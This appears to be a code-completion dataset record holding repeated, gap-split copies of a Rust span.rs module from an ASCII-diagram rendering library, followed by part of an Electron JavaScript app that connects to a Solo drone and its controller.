pub fn paste_at(&self, loc: Cell, other: &Self) -> Self {
let mut this = self.clone();
for (cell, ch) in other.deref() {
this.push((*cell + loc, *ch));
}
this.sort();
this.dedup();
this
}
fn top_left(&self) -> Cell {
let bounds = self.bounds().expect("must have bounds");
bounds.0
}
pub fn localize_point(&self, point: Point) -> Point {
self.top_left().localize_point(point)
}
/// returns the top_left most cell which aligns the top most and the left most cell.
pub(crate) fn bounds(&self) -> Option<(Cell, Cell)> {
if let Some((min_y, max_y)) =
self.iter().map(|(cell, _)| cell.y).minmax().into_option()
{
if let Some((min_x, max_x)) =
self.iter().map(|(cell, _)| cell.x).minmax().into_option()
{
Some((Cell::new(min_x, min_y), Cell::new(max_x, max_y)))
} else {
None
}
} else {
None
}
}
pub fn cell_bounds(&self) -> Option<Bounds> {
if let Some((top_left, top_right)) = self.bounds() {
Some(Bounds::new(top_left, top_right))
} else {
None
}
}
/// shift the cells relative to the top_left most bound
pub(crate) fn localize(self) -> Self {
if let Some((tl, _br)) = self.bounds() {
let mut new_self = Span(vec![]);
for (cell, ch) in self.iter() {
let local_cell = tl.localize_cell(*cell);
new_self.push((local_cell, *ch));
}
new_self
} else {
self
}
}
/// convert this span into fragments applying endorsement
/// of group into fragments
///
///
/// TODO: return the rejects as Span, instead of Contacts
pub(crate) fn endorse(self) -> Endorse<FragmentSpan, Span> {
// try to endorse as circles or arcs
let (mut accepted, un_endorsed_span): (Vec<FragmentSpan>, Span) =
self.endorse_to_arcs_and_circles();
// convert into contacts and try to endorse as rects fragments
let un_endorsed_contacts: Vec<Contacts> = un_endorsed_span.into();
let rect_endorsed: Endorse<FragmentSpan, Contacts> =
Contacts::endorse_rects(un_endorsed_contacts);
accepted.extend(rect_endorsed.accepted);
let re_endorsed = Self::re_endorse(rect_endorsed.rejects);
let mut endorsed = Endorse {
accepted,
rejects: vec![],
};
endorsed.extend(re_endorsed);
endorsed
}
/// re try endorsing the contacts into arc and circles by converting it to span first
fn re_endorse(rect_rejects: Vec<Contacts>) -> Endorse<FragmentSpan, Span> {
// convert back to span
let span_rejects: Vec<Span> = rect_rejects
.into_iter()
.map(|contact| contact.span())
.collect();
let span_rejects: Vec<Span> = Span::merge_recursive(span_rejects);
// try to endorse as circles or arcs one more time
let (accepted, rejects): (Vec<Vec<FragmentSpan>>, Vec<Span>) =
span_rejects
.into_iter()
.map(|span| span.endorse_to_arcs_and_circles())
.unzip();
Endorse {
accepted: accepted.into_iter().flatten().collect(),
rejects,
}
}
/// endorse this span into circles, half_circle, quarter_circle only
fn endorse_to_arcs_and_circles(self) -> (Vec<FragmentSpan>, Span) {
let mut accepted = vec![];
let (top_left, _) = self.bounds().expect("must have bounds");
let un_endorsed_span: Span = if let Some((circle, un_endorsed_span)) =
circle_map::endorse_circle_span(&self)
{
let circle = circle.absolute_position(top_left);
let circle_frag_span =
FragmentSpan::new(self.clone(), circle.into());
accepted.push(circle_frag_span);
un_endorsed_span
} else if let Some((three_quarters_arc, un_endorsed_span)) =
circle_map::endorse_three_quarters_arc_span(&self)
{
let three_quarters_arc =
three_quarters_arc.absolute_position(top_left);
let three_quarters_arc_frag_span =
FragmentSpan::new(self.clone(), three_quarters_arc.into());
accepted.push(three_quarters_arc_frag_span);
un_endorsed_span
} else if let Some((half_arc, un_endorsed_span)) =
circle_map::endorse_half_arc_span(&self)
{
let half_arc = half_arc.absolute_position(top_left);
let half_arc_frag_span =
FragmentSpan::new(self.clone(), half_arc.into());
accepted.push(half_arc_frag_span);
un_endorsed_span
} else if let Some((arc, un_endorsed_span)) =
circle_map::endorse_quarter_arc_span(&self)
{
let arc = arc.absolute_position(top_left);
let arc_frag_span = FragmentSpan::new(self.clone(), arc.into());
accepted.push(arc_frag_span);
un_endorsed_span
} else {
self
};
(accepted, un_endorsed_span)
}
/// create a span of the cells that is inside of the start and end bound cells
pub(crate) fn extract(&self, bound1: Cell, bound2: Cell) -> Self {
Span(
self.iter()
.map(|(cell, ch)| (*cell, *ch))
.filter(|(cell, _ch)| cell.is_bounded(bound1, bound2))
.collect(),
)
}
/// returns true if any cell on this span
/// is within the bounds of `bound1` and `bound2`
pub fn is_bounded(&self, bound1: Cell, bound2: Cell) -> bool {
self.iter()
.all(|(cell, ch)| cell.is_bounded(bound1, bound2))
}
pub fn hit_cell(&self, needle: Cell) -> bool {
self.iter().any(|(cell, ch)| *cell == needle)
}
/// merge as is without checking it it can
pub fn merge_no_check(&self, other: &Self) -> Self {
let mut cells = self.0.clone();
cells.extend(&other.0);
Span(cells)
}
}
impl Merge for Span {
fn merge(&self, other: &Self) -> Option<Self> {
if self.can_merge(other) {
Some(self.merge_no_check(other))
} else |
}
}
impl Bounds {
pub fn new(cell1: Cell, cell2: Cell) -> Self {
let (top_left, bottom_right) = Cell::rearrange_bound(cell1, cell2);
Self {
top_left,
bottom_right,
}
}
pub fn top_left(&self) -> Cell {
self.top_left
}
pub fn bottom_right(&self) -> Cell {
self.bottom_right
}
pub fn top_right(&self) -> Cell {
Cell::new(self.bottom_right.x, self.top_left.y)
}
pub fn bottom_left(&self) -> Cell {
Cell::new(self.top_left.x, self.bottom_right.y)
}
}
/// create a property buffer for all the cells of this span
impl<'p> From<Span> for PropertyBuffer<'p> {
fn from(span: Span) -> Self {
let mut pb = PropertyBuffer::new();
for (cell, ch) in span.iter() {
if let Some(property) = Property::from_char(*ch) {
pb.as_mut().insert(*cell, property);
}
}
pb
}
}
/// Grouping cell by adjacents are not enough
///
/// grouping them together when they are actually connected
/// is the most approprivate way of grouping
/// Span just provides an optimization of the number
/// of elements to be checked.
/// Only elements on the same span are checked to see if they
/// belong on the same group
///
impl From<Span> for Vec<Contacts> {
fn from(span: Span) -> Vec<Contacts> {
let fb = FragmentBuffer::from(span);
let merged_fragments: Vec<FragmentSpan> = fb.merge_fragment_spans();
let contacts: Vec<Contacts> = merged_fragments
.into_iter()
.map(|frag| Contacts::new(frag))
.collect();
Contacts::merge_recursive(contacts)
}
}
/// First we crate a property buffer based on the cell,char content of this span
/// and then based on the property, we extract the accurate fragments
///
/// If a character has no property, try to see if has equivalent fragments from unicode_map
/// otherwise add it to the fragment_buffer as a text fragment
impl From<Span> for FragmentBuffer {
fn from(span: Span) -> FragmentBuffer {
let pb = PropertyBuffer::from(span.clone());
let mut fb = FragmentBuffer::from(pb.clone());
for (cell, ch) in span.iter() {
if pb.as_ref().get(cell).is_none() {
if let Some(fragments) = UNICODE_FRAGMENTS.get(ch) {
fb.add_fragments_to_cell(*cell, *ch, fragments.clone());
} else {
fb.add_fragment_to_cell(
*cell,
*ch,
fragment::cell_text(*ch),
);
}
}
}
fb
}
}
impl fmt::Display for Span {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
let mut buffer = StringBuffer::new();
if let Some((tl, _br)) = self.bounds() {
for (cell, ch) in self.iter() {
if *ch != '\0' && !ch.is_whitespace() {
let local = tl.localize_cell(*cell);
buffer.add_char(local.x, local.y, *ch);
}
}
}
write!(f, "{}", buffer.to_string())
}
}
#[cfg(test)]
mod test_span;
| {
None
} | conditional_block |
span.rs | use crate::{
buffer::{
cell_buffer::{Contacts, Endorse},
fragment_buffer::FragmentSpan,
FragmentBuffer, Property, PropertyBuffer, StringBuffer,
},
fragment,
fragment::Circle,
map::{circle_map, UNICODE_FRAGMENTS},
Cell, Fragment, Merge, Point, Settings,
};
use itertools::Itertools;
use std::{
fmt,
ops::{Deref, DerefMut},
};
/// A describes where a char came from relative to the source ascii text
/// The primary purpose of span is to group adjacent cell together
#[derive(Debug, Clone, PartialEq, Eq)]
pub struct Span(pub Vec<(Cell, char)>);
impl Deref for Span {
type Target = Vec<(Cell, char)>;
fn deref(&self) -> &Self::Target {
&self.0
}
}
pub struct Bounds {
top_left: Cell,
bottom_right: Cell,
}
impl DerefMut for Span {
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
impl From<Vec<(Cell, char)>> for Span {
fn from(cell_chars: Vec<(Cell, char)>) -> Self {
Span(cell_chars)
}
}
impl Span {
pub(crate) fn new(cell: Cell, ch: char) -> Self {
Span(vec![(cell, ch)])
}
pub(super) fn is_adjacent(&self, cell: &Cell) -> bool {
self.iter()
.rev()
.any(|(ex_cell, _)| ex_cell.is_adjacent(cell))
}
/// if any cell of this span is adjacent to any cell of the other
/// Use .rev() to check the last cell of this Span against the first cell of the other Span
/// They have a high change of matching faster
pub(super) fn can_merge(&self, other: &Self) -> bool {
self.iter().rev().any(|(cell, _)| {
other
.iter()
.any(|(other_cell, _)| cell.is_adjacent(other_cell))
})
}
/// paste the other Span at cell location `loc`
pub fn paste_at(&self, loc: Cell, other: &Self) -> Self {
let mut this = self.clone();
for (cell, ch) in other.deref() {
this.push((*cell + loc, *ch));
}
this.sort();
this.dedup();
this
}
fn top_left(&self) -> Cell {
let bounds = self.bounds().expect("must have bounds");
bounds.0
}
pub fn localize_point(&self, point: Point) -> Point {
self.top_left().localize_point(point)
}
/// returns the top_left most cell which aligns the top most and the left most cell.
pub(crate) fn bounds(&self) -> Option<(Cell, Cell)> {
if let Some((min_y, max_y)) =
self.iter().map(|(cell, _)| cell.y).minmax().into_option()
{
if let Some((min_x, max_x)) =
self.iter().map(|(cell, _)| cell.x).minmax().into_option()
{
Some((Cell::new(min_x, min_y), Cell::new(max_x, max_y)))
} else {
None
}
} else {
None
}
}
pub fn cell_bounds(&self) -> Option<Bounds> {
if let Some((top_left, top_right)) = self.bounds() {
Some(Bounds::new(top_left, top_right))
} else {
None
}
}
/// shift the cells relative to the top_left most bound
pub(crate) fn localize(self) -> Self {
if let Some((tl, _br)) = self.bounds() {
let mut new_self = Span(vec![]);
for (cell, ch) in self.iter() {
let local_cell = tl.localize_cell(*cell);
new_self.push((local_cell, *ch));
}
new_self
} else {
self
}
}
/// convert this span into fragments applying endorsement
/// of group into fragments
///
///
/// TODO: return the rejects as Span, instead of Contacts
pub(crate) fn endorse(self) -> Endorse<FragmentSpan, Span> {
// try to endorse as circles or arcs
let (mut accepted, un_endorsed_span): (Vec<FragmentSpan>, Span) =
self.endorse_to_arcs_and_circles();
// convert into contacts and try to endorse as rects fragments
let un_endorsed_contacts: Vec<Contacts> = un_endorsed_span.into();
let rect_endorsed: Endorse<FragmentSpan, Contacts> =
Contacts::endorse_rects(un_endorsed_contacts);
accepted.extend(rect_endorsed.accepted);
let re_endorsed = Self::re_endorse(rect_endorsed.rejects);
let mut endorsed = Endorse {
accepted,
rejects: vec![],
};
endorsed.extend(re_endorsed);
endorsed
}
/// re try endorsing the contacts into arc and circles by converting it to span first
fn re_endorse(rect_rejects: Vec<Contacts>) -> Endorse<FragmentSpan, Span> {
// convert back to span
let span_rejects: Vec<Span> = rect_rejects
.into_iter()
.map(|contact| contact.span())
.collect();
let span_rejects: Vec<Span> = Span::merge_recursive(span_rejects);
// try to endorse as circles or arcs one more time
let (accepted, rejects): (Vec<Vec<FragmentSpan>>, Vec<Span>) =
span_rejects
.into_iter()
.map(|span| span.endorse_to_arcs_and_circles())
.unzip();
Endorse {
accepted: accepted.into_iter().flatten().collect(),
rejects,
}
}
/// endorse this span into circles, half_circle, quarter_circle only
fn endorse_to_arcs_and_circles(self) -> (Vec<FragmentSpan>, Span) {
let mut accepted = vec![];
let (top_left, _) = self.bounds().expect("must have bounds");
let un_endorsed_span: Span = if let Some((circle, un_endorsed_span)) =
circle_map::endorse_circle_span(&self)
{
let circle = circle.absolute_position(top_left);
let circle_frag_span =
FragmentSpan::new(self.clone(), circle.into());
accepted.push(circle_frag_span);
un_endorsed_span
} else if let Some((three_quarters_arc, un_endorsed_span)) =
circle_map::endorse_three_quarters_arc_span(&self)
{
let three_quarters_arc =
three_quarters_arc.absolute_position(top_left);
let three_quarters_arc_frag_span =
FragmentSpan::new(self.clone(), three_quarters_arc.into());
accepted.push(three_quarters_arc_frag_span);
un_endorsed_span
} else if let Some((half_arc, un_endorsed_span)) =
circle_map::endorse_half_arc_span(&self)
{
let half_arc = half_arc.absolute_position(top_left);
let half_arc_frag_span =
FragmentSpan::new(self.clone(), half_arc.into());
accepted.push(half_arc_frag_span);
un_endorsed_span
} else if let Some((arc, un_endorsed_span)) =
circle_map::endorse_quarter_arc_span(&self)
{
let arc = arc.absolute_position(top_left);
let arc_frag_span = FragmentSpan::new(self.clone(), arc.into());
accepted.push(arc_frag_span);
un_endorsed_span
} else {
self
};
(accepted, un_endorsed_span)
}
/// create a span of the cells that is inside of the start and end bound cells
pub(crate) fn extract(&self, bound1: Cell, bound2: Cell) -> Self {
Span(
self.iter()
.map(|(cell, ch)| (*cell, *ch))
.filter(|(cell, _ch)| cell.is_bounded(bound1, bound2))
.collect(),
)
}
/// returns true if any cell on this span
/// is within the bounds of `bound1` and `bound2`
pub fn is_bounded(&self, bound1: Cell, bound2: Cell) -> bool {
self.iter()
.all(|(cell, ch)| cell.is_bounded(bound1, bound2))
}
pub fn hit_cell(&self, needle: Cell) -> bool {
self.iter().any(|(cell, ch)| *cell == needle)
}
/// merge as is without checking it it can
pub fn merge_no_check(&self, other: &Self) -> Self {
let mut cells = self.0.clone();
cells.extend(&other.0);
Span(cells)
}
}
impl Merge for Span {
fn merge(&self, other: &Self) -> Option<Self> {
if self.can_merge(other) {
Some(self.merge_no_check(other))
} else {
None
}
}
}
impl Bounds {
pub fn new(cell1: Cell, cell2: Cell) -> Self {
let (top_left, bottom_right) = Cell::rearrange_bound(cell1, cell2);
Self {
top_left,
bottom_right,
}
}
pub fn top_left(&self) -> Cell {
self.top_left
}
pub fn bottom_right(&self) -> Cell {
self.bottom_right
}
pub fn top_right(&self) -> Cell {
Cell::new(self.bottom_right.x, self.top_left.y)
}
pub fn | (&self) -> Cell {
Cell::new(self.top_left.x, self.bottom_right.y)
}
}
/// create a property buffer for all the cells of this span
impl<'p> From<Span> for PropertyBuffer<'p> {
fn from(span: Span) -> Self {
let mut pb = PropertyBuffer::new();
for (cell, ch) in span.iter() {
if let Some(property) = Property::from_char(*ch) {
pb.as_mut().insert(*cell, property);
}
}
pb
}
}
/// Grouping cell by adjacents are not enough
///
/// grouping them together when they are actually connected
/// is the most approprivate way of grouping
/// Span just provides an optimization of the number
/// of elements to be checked.
/// Only elements on the same span are checked to see if they
/// belong on the same group
///
impl From<Span> for Vec<Contacts> {
fn from(span: Span) -> Vec<Contacts> {
let fb = FragmentBuffer::from(span);
let merged_fragments: Vec<FragmentSpan> = fb.merge_fragment_spans();
let contacts: Vec<Contacts> = merged_fragments
.into_iter()
.map(|frag| Contacts::new(frag))
.collect();
Contacts::merge_recursive(contacts)
}
}
/// First we crate a property buffer based on the cell,char content of this span
/// and then based on the property, we extract the accurate fragments
///
/// If a character has no property, try to see if has equivalent fragments from unicode_map
/// otherwise add it to the fragment_buffer as a text fragment
impl From<Span> for FragmentBuffer {
fn from(span: Span) -> FragmentBuffer {
let pb = PropertyBuffer::from(span.clone());
let mut fb = FragmentBuffer::from(pb.clone());
for (cell, ch) in span.iter() {
if pb.as_ref().get(cell).is_none() {
if let Some(fragments) = UNICODE_FRAGMENTS.get(ch) {
fb.add_fragments_to_cell(*cell, *ch, fragments.clone());
} else {
fb.add_fragment_to_cell(
*cell,
*ch,
fragment::cell_text(*ch),
);
}
}
}
fb
}
}
impl fmt::Display for Span {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
let mut buffer = StringBuffer::new();
if let Some((tl, _br)) = self.bounds() {
for (cell, ch) in self.iter() {
if *ch != '\0' && !ch.is_whitespace() {
let local = tl.localize_cell(*cell);
buffer.add_char(local.x, local.y, *ch);
}
}
}
write!(f, "{}", buffer.to_string())
}
}
#[cfg(test)]
mod test_span;
| bottom_left | identifier_name |
span.rs | use crate::{
buffer::{
cell_buffer::{Contacts, Endorse},
fragment_buffer::FragmentSpan,
FragmentBuffer, Property, PropertyBuffer, StringBuffer,
},
fragment,
fragment::Circle,
map::{circle_map, UNICODE_FRAGMENTS},
Cell, Fragment, Merge, Point, Settings,
};
use itertools::Itertools;
use std::{
fmt,
ops::{Deref, DerefMut},
};
/// A describes where a char came from relative to the source ascii text
/// The primary purpose of span is to group adjacent cell together
#[derive(Debug, Clone, PartialEq, Eq)]
pub struct Span(pub Vec<(Cell, char)>);
impl Deref for Span {
type Target = Vec<(Cell, char)>;
fn deref(&self) -> &Self::Target {
&self.0
}
}
pub struct Bounds {
top_left: Cell,
bottom_right: Cell,
}
impl DerefMut for Span {
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
impl From<Vec<(Cell, char)>> for Span {
fn from(cell_chars: Vec<(Cell, char)>) -> Self {
Span(cell_chars)
}
}
impl Span {
pub(crate) fn new(cell: Cell, ch: char) -> Self {
Span(vec![(cell, ch)])
}
pub(super) fn is_adjacent(&self, cell: &Cell) -> bool {
self.iter()
.rev()
.any(|(ex_cell, _)| ex_cell.is_adjacent(cell))
}
/// if any cell of this span is adjacent to any cell of the other
/// Use .rev() to check the last cell of this Span against the first cell of the other Span
/// They have a high change of matching faster
pub(super) fn can_merge(&self, other: &Self) -> bool {
self.iter().rev().any(|(cell, _)| {
other
.iter()
.any(|(other_cell, _)| cell.is_adjacent(other_cell))
})
}
/// paste the other Span at cell location `loc`
pub fn paste_at(&self, loc: Cell, other: &Self) -> Self {
let mut this = self.clone();
for (cell, ch) in other.deref() {
this.push((*cell + loc, *ch));
}
this.sort();
this.dedup();
this
}
fn top_left(&self) -> Cell {
let bounds = self.bounds().expect("must have bounds");
bounds.0
}
pub fn localize_point(&self, point: Point) -> Point {
self.top_left().localize_point(point)
}
/// returns the top_left most cell which aligns the top most and the left most cell.
pub(crate) fn bounds(&self) -> Option<(Cell, Cell)> {
if let Some((min_y, max_y)) =
self.iter().map(|(cell, _)| cell.y).minmax().into_option()
{
if let Some((min_x, max_x)) =
self.iter().map(|(cell, _)| cell.x).minmax().into_option()
{
Some((Cell::new(min_x, min_y), Cell::new(max_x, max_y)))
} else {
None
}
} else {
None
}
}
pub fn cell_bounds(&self) -> Option<Bounds> {
if let Some((top_left, top_right)) = self.bounds() {
Some(Bounds::new(top_left, top_right))
} else {
None
}
}
/// shift the cells relative to the top_left most bound
pub(crate) fn localize(self) -> Self {
if let Some((tl, _br)) = self.bounds() {
let mut new_self = Span(vec![]);
for (cell, ch) in self.iter() {
let local_cell = tl.localize_cell(*cell);
new_self.push((local_cell, *ch));
}
new_self
} else {
self
}
}
/// convert this span into fragments applying endorsement
/// of group into fragments
///
///
/// TODO: return the rejects as Span, instead of Contacts
pub(crate) fn endorse(self) -> Endorse<FragmentSpan, Span> {
// try to endorse as circles or arcs
let (mut accepted, un_endorsed_span): (Vec<FragmentSpan>, Span) =
self.endorse_to_arcs_and_circles();
// convert into contacts and try to endorse as rects fragments
let un_endorsed_contacts: Vec<Contacts> = un_endorsed_span.into();
let rect_endorsed: Endorse<FragmentSpan, Contacts> =
Contacts::endorse_rects(un_endorsed_contacts);
accepted.extend(rect_endorsed.accepted);
| accepted,
rejects: vec![],
};
endorsed.extend(re_endorsed);
endorsed
}
/// re try endorsing the contacts into arc and circles by converting it to span first
fn re_endorse(rect_rejects: Vec<Contacts>) -> Endorse<FragmentSpan, Span> {
// convert back to span
let span_rejects: Vec<Span> = rect_rejects
.into_iter()
.map(|contact| contact.span())
.collect();
let span_rejects: Vec<Span> = Span::merge_recursive(span_rejects);
// try to endorse as circles or arcs one more time
let (accepted, rejects): (Vec<Vec<FragmentSpan>>, Vec<Span>) =
span_rejects
.into_iter()
.map(|span| span.endorse_to_arcs_and_circles())
.unzip();
Endorse {
accepted: accepted.into_iter().flatten().collect(),
rejects,
}
}
/// endorse this span into circles, half_circle, quarter_circle only
fn endorse_to_arcs_and_circles(self) -> (Vec<FragmentSpan>, Span) {
let mut accepted = vec![];
let (top_left, _) = self.bounds().expect("must have bounds");
let un_endorsed_span: Span = if let Some((circle, un_endorsed_span)) =
circle_map::endorse_circle_span(&self)
{
let circle = circle.absolute_position(top_left);
let circle_frag_span =
FragmentSpan::new(self.clone(), circle.into());
accepted.push(circle_frag_span);
un_endorsed_span
} else if let Some((three_quarters_arc, un_endorsed_span)) =
circle_map::endorse_three_quarters_arc_span(&self)
{
let three_quarters_arc =
three_quarters_arc.absolute_position(top_left);
let three_quarters_arc_frag_span =
FragmentSpan::new(self.clone(), three_quarters_arc.into());
accepted.push(three_quarters_arc_frag_span);
un_endorsed_span
} else if let Some((half_arc, un_endorsed_span)) =
circle_map::endorse_half_arc_span(&self)
{
let half_arc = half_arc.absolute_position(top_left);
let half_arc_frag_span =
FragmentSpan::new(self.clone(), half_arc.into());
accepted.push(half_arc_frag_span);
un_endorsed_span
} else if let Some((arc, un_endorsed_span)) =
circle_map::endorse_quarter_arc_span(&self)
{
let arc = arc.absolute_position(top_left);
let arc_frag_span = FragmentSpan::new(self.clone(), arc.into());
accepted.push(arc_frag_span);
un_endorsed_span
} else {
self
};
(accepted, un_endorsed_span)
}
/// create a span of the cells that is inside of the start and end bound cells
pub(crate) fn extract(&self, bound1: Cell, bound2: Cell) -> Self {
Span(
self.iter()
.map(|(cell, ch)| (*cell, *ch))
.filter(|(cell, _ch)| cell.is_bounded(bound1, bound2))
.collect(),
)
}
/// returns true if any cell on this span
/// is within the bounds of `bound1` and `bound2`
pub fn is_bounded(&self, bound1: Cell, bound2: Cell) -> bool {
self.iter()
.all(|(cell, ch)| cell.is_bounded(bound1, bound2))
}
pub fn hit_cell(&self, needle: Cell) -> bool {
self.iter().any(|(cell, ch)| *cell == needle)
}
/// merge as is without checking it it can
pub fn merge_no_check(&self, other: &Self) -> Self {
let mut cells = self.0.clone();
cells.extend(&other.0);
Span(cells)
}
}
impl Merge for Span {
fn merge(&self, other: &Self) -> Option<Self> {
if self.can_merge(other) {
Some(self.merge_no_check(other))
} else {
None
}
}
}
impl Bounds {
pub fn new(cell1: Cell, cell2: Cell) -> Self {
let (top_left, bottom_right) = Cell::rearrange_bound(cell1, cell2);
Self {
top_left,
bottom_right,
}
}
pub fn top_left(&self) -> Cell {
self.top_left
}
pub fn bottom_right(&self) -> Cell {
self.bottom_right
}
pub fn top_right(&self) -> Cell {
Cell::new(self.bottom_right.x, self.top_left.y)
}
pub fn bottom_left(&self) -> Cell {
Cell::new(self.top_left.x, self.bottom_right.y)
}
}
/// create a property buffer for all the cells of this span
impl<'p> From<Span> for PropertyBuffer<'p> {
fn from(span: Span) -> Self {
let mut pb = PropertyBuffer::new();
for (cell, ch) in span.iter() {
if let Some(property) = Property::from_char(*ch) {
pb.as_mut().insert(*cell, property);
}
}
pb
}
}
/// Grouping cell by adjacents are not enough
///
/// grouping them together when they are actually connected
/// is the most approprivate way of grouping
/// Span just provides an optimization of the number
/// of elements to be checked.
/// Only elements on the same span are checked to see if they
/// belong on the same group
///
impl From<Span> for Vec<Contacts> {
fn from(span: Span) -> Vec<Contacts> {
let fb = FragmentBuffer::from(span);
let merged_fragments: Vec<FragmentSpan> = fb.merge_fragment_spans();
let contacts: Vec<Contacts> = merged_fragments
.into_iter()
.map(|frag| Contacts::new(frag))
.collect();
Contacts::merge_recursive(contacts)
}
}
/// First we crate a property buffer based on the cell,char content of this span
/// and then based on the property, we extract the accurate fragments
///
/// If a character has no property, try to see if has equivalent fragments from unicode_map
/// otherwise add it to the fragment_buffer as a text fragment
impl From<Span> for FragmentBuffer {
fn from(span: Span) -> FragmentBuffer {
let pb = PropertyBuffer::from(span.clone());
let mut fb = FragmentBuffer::from(pb.clone());
for (cell, ch) in span.iter() {
if pb.as_ref().get(cell).is_none() {
if let Some(fragments) = UNICODE_FRAGMENTS.get(ch) {
fb.add_fragments_to_cell(*cell, *ch, fragments.clone());
} else {
fb.add_fragment_to_cell(
*cell,
*ch,
fragment::cell_text(*ch),
);
}
}
}
fb
}
}
impl fmt::Display for Span {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
let mut buffer = StringBuffer::new();
if let Some((tl, _br)) = self.bounds() {
for (cell, ch) in self.iter() {
if *ch != '\0' && !ch.is_whitespace() {
let local = tl.localize_cell(*cell);
buffer.add_char(local.x, local.y, *ch);
}
}
}
write!(f, "{}", buffer.to_string())
}
}
#[cfg(test)]
mod test_span; | let re_endorsed = Self::re_endorse(rect_endorsed.rejects);
let mut endorsed = Endorse { | random_line_split |
SoloToolkit.js | const ipcRenderer = require('electron').ipcRenderer;
const Device = require('./app/js/Device');
const Mousetrap = require('mousetrap');
const {remote} = require("electron");
//Solo + controller device
let solo = new Device(successConnecting, successDisconnecting, failureConnecting);
// Create Device instance for controller and device
solo.on('updated_versions', ()=>{
//Re-load the system info page when we get updated version info
if($('#system_info_button').hasClass('active')){ //if the system info mode is active, reload it to show the new data
view_system_info();
}
});
// Connect navbar and sidebar
let connect_button = $('#connect-button');
$("#connect-progress-bar").hide();
connect_button.on('click', connectButtonClicked);
function connectButtonClicked(){
Logger.info('Clicked connect button!');
if (!solo.controllerConnected && !solo.soloConnected){
Logger.log('info',"Solo connected: " + solo.soloConnected + " Controller connected: " + solo.controllerConnected);
solo.connect_to_controller();
//If controller connects successfully, connection to Solo is attempted.
connectButtonDisabled();
connect_button.prop("disabled", true);
$("#connect-progress-bar").show();
} else { //something is connected, we should disconnect from everything
solo.disconnect();
}
};
//Connection status callbacks
function successConnecting(device){
Logger.log('info',"Connected successfully to " + device);
//Update the connection info in the bottom right of the app
$("#" + device + "-connection-status").html(" connected");
$("." + device + "-connection").addClass("active");
connectButtonConnected(); //Update the connect button
if (device === "controller"){
//We're connected to controller successfully, so connect to Solo
solo.connect_to_solo();
};
};
function failureConnecting(device){
// Called if we encounter an error trying to connect to either Solo or controller
// Will display a 'failure connecting' message to the user
Logger.log('info',"Error or disconnection from " + device);
$("#" + device + "-connection-status").html(" disconnected");
$("." + device + "-connection").removeClass("active");
connection_error_message(device);
if (device === "controller"){
connectButtonEnabled();
}
};
function successDisconnecting(device, message){
// Called if we successfully disconnect from a device (like when Disconnect button pressed)
// Will not display a message to the user
Logger.log('info',"Successfully disconnected from " + device);
$("#" + device + "-connection-status").html(" disconnected");
$("." + device + "-connection").removeClass("active");
if (device === "controller"){ //If we're not connected to controller, good chance we're not going to be connected to Solo
connectButtonEnabled();
solo.controllerConnected = false;
} else {
solo.soloConnected = false;
}
if (message){
display_overlay("connection", `Disconnected from ${message}`, `Check connections.`);
}
}
function connectButtonDisabled(){
connect_button.addClass('disabled');
connect_button.prop("disabled", true);
};
function connectButtonEnabled(){
connect_button.html('CONNECT');
connect_button.removeClass('disabled');
connect_button.prop("disabled", false);
$("#connect-progress-bar").hide();
};
function connectButtonConnected(){
//If we successfully conneced, switch the state of the connect button to enable disconnecting
connectButtonEnabled();
connect_button.html("Disconnect");
}
function connection_error_message(device_name){
if (device_name === "controller") {
display_overlay("connection","Could not connect to controller", "No connection to controller available. Check your wifi connection.");
} else {
display_overlay("connection", "Could not connect to Solo", "No connection to Solo is available. Try power cycling Solo.");
}
};
//OVERLAYS
let overlay_options = {
'keyboard': true, // teardown when <esc> key is pressed (default: true)
'static': false, // maintain overlay when clicked (default: false)
'onclose': function() {} // execute function when overlay is closed
};
function display_overlay(type, heading, body, options){
Logger.log('info',"display_overlay()");
/*param (String) type - type of modal (defaults to error)
Available types:
'error' - error dialog
'settings' – settings dialog
param {String} heading - heading for the modal
param {String} body - body text for the dialog
param {Object} options - optional options Object
Example -
{
image: "<img src='./app/assets/img/stick_cal.gif' class='settings-image' alt='stick calibration'>",
cancel_button: true, //off by default
confirm_button: true, //true by default
button_text: "Confirm"
}
*/
//determine the type of modal to display (error or setting)
let conformed_type = '';
type = type.toLowerCase().trim();
switch (type){
case "error":
conformed_type = 'warning';
break;
case "settings":
conformed_type = "settings";
break
case "connection":
conformed_type = "signal_wifi_off";
break;
}
let modal_dialog = document.createElement('div');
let modal_options = {
static: true
}
modal_dialog.style.width = '50%';
modal_dialog.style.height = 'fit-content';
modal_dialog.style.margin = '100px auto';
modal_dialog.style.backgroundColor = '#fff';
modal_dialog.innerHTML = modal_template({modal_type: conformed_type, modal_heading: heading, modal_body: body});
mui.overlay('on', modal_options, modal_dialog); //this inserts the div into the DOM and makes the optional-el div available to jquery
let optional_button = $('#optional-button');
let optional_image_el = $("#optional-image-el");
if (options){
Logger.log('info',"Overlay options passed: ");
Logger.log('info',options);
if (!options.cancel_button){
optional_button.hide();
}
if (options.button_text){
$('#modal-button').html(options.button_text);
}
if(options.image){
optional_image_el.html(options.image);
}
if(options.confirm_button == false){
$('#modal-button').hide();
}
} else {
Logger.log('info',"No options passed to display_overlay");
optional_button.hide();
optional_image_el.html('');
}
$("#modal-button").click(()=>{
Logger.log('info',"close dialog button clicked");
clear_overlay(modal_dialog);
});
};
function clear_overlay(){
Logger.log('info',"clear_overlay()");
//@param {Object} dialog - DOM element used to create an overlay, typically the modal_dialog
mui.overlay('off');
}
//FILE DIALOGS
function getDirectory(input_element){
|
// Templates and views
$(document).ready(function load_templates(){
//Renders all templates on initialization and drops them into their divs
$('#system-view').html(system_info_template(solo.versions));
$('#logs-view').html(logs_template());
$('#settings-view').html(settings_template());
//switches the view to system info page on first run
view_system_info();
});
//Attach keyboard shortcuts
$(document).ready(()=>{
//No keyboard shortcuts attached yet
//Use Mousetrap to connect keyboard shortcuts
});
//SIDEBAR
//Toggle the active class on sidebar items
let remove_all_active_sidebar = function(){
Logger.log('info',"remove_all_active_sidebar");
//Generic helper for styling sidebar items
$("#system_info_button").removeClass('active');
$('#system_info_button >p').removeClass('active');
$("#log_collection_button").removeClass('active');
$('#log_collection_button >p').removeClass('active');
$("#system_settings_button").removeClass('active');
$('#system_settings_button >p').removeClass('active');
};
let system_info_button = $('#system_info_button');
system_info_button.click(()=>{view_system_info()});
function view_system_info(){
//If the info page is active, render the menu with the latest versions from the device object
